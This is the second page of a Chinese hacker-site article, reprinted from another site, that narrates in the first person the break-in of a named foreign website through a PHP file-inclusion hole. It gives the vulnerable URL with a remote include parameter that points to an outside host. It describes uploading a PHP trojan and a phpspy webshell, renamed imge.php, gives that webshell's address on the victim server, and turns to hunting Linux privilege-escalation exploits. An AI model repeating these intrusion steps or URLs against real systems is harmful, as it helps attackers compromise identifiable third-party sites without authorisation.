黑客如何利用文件包含漏洞进行网站入侵

• 　　php环境信息

  　　编辑lang.class.php的文件，先写了一个phpspy。但是登陆webshell的后，页面转到其他的页面。还是先传一可以上传的文件的马儿吧，传了一个国外的php木马，木马的功能很的大，浏览http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=%2Fopt%2Foracle%2Fproduct%2F10gbi%2Fj2ee%2Fgate%2Fapplications%2Fgate%2Fgate%2Fgate%2F。

  　　包含的国外php木马

  　　但是这个国外的php马还是上传一个经过修改的phpspy吧，用着舒服一点，上传得文件改为了imge.php，现在访问http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305，登陆后一台webshell就在我们的眼前了。权限也不错，但是由于是linux系统，也不知道怎么去提权，还是再放一下吧!

  　　phpspy上传成功

  　　四、学习的第三天

  　　对linux下的提权一点都不了解，没办法只有寻求帮助了。Jinsdb师兄叫我去一些好的网站找一下exp看看，他还告诉我了上次在我的网站中的php文件浏览的时候是找不到文件的原因：因为我的系统是2003的，所以要在IIS的ISAPI 筛选器中加.php后缀,在xp下访问php文件直接就可以浏览。看来上次我得到的服务器基本上是2003的。

  　　看来这次的学习也蛮有意义的!发现一点，国外的网站的管理人员比较重视安全。在出现漏洞的第二天，很多网站都把漏洞补了，还有的网站被入侵后能马上发现，并及时清除了webshell。

  （出处：急速软件下载学院）

• 上一页 [1] [2] 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 黑客如何利用文件包含漏洞进行网站入侵 相关文章：
• ·惠普82款笔记本存在严重网络安全漏洞
• ·黑客如何利用文件包含漏洞进行网站入侵
• ·简单分析2007年11月十大网络安全漏洞
• ·简单分析Script脚本跨站攻击漏洞技术
• ·系统漏洞的形成和防治办法
• ·KV网络版技术升级 离线管理全网漏洞
• ·用Nmap为Windows网络找漏洞
• ·QuickTime最新漏洞 Windows用户最危险
• ·微软11月2个补丁修补Windows漏洞
• ·Windows 2000中的加密技术被发现漏洞
• 黑客如何利用文件包含漏洞进行网站入侵 相关软件
• ·澎湃 番茄花园漏洞补丁 bat&reg 漏洞比病毒可怕
• ·宁夏大学 澎湃 番茄花园v2.9漏洞补丁 bat&reg 极品
• ·澎湃 番茄花园v2.9漏洞补丁 bat&reg 一定查看
• ·金山毒霸漏洞修复2007 (漏洞库2006.11.15.2)
• ·瑞星系统安全漏洞扫描器V1.0 Build 1111 绿色版
• ·动感下载的上传漏洞+提升权限
• ·利用落日整站上传漏洞
• ·vBulletin ''faq.php''脚本路径泄露漏洞
• ·最新的JPG图片漏洞演示动画
• ·CPB1.3论坛漏洞

上一篇:Linux和Windows系统升级的最大不同

下一篇:还原Windows Vista所有被隐藏更新及信息

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐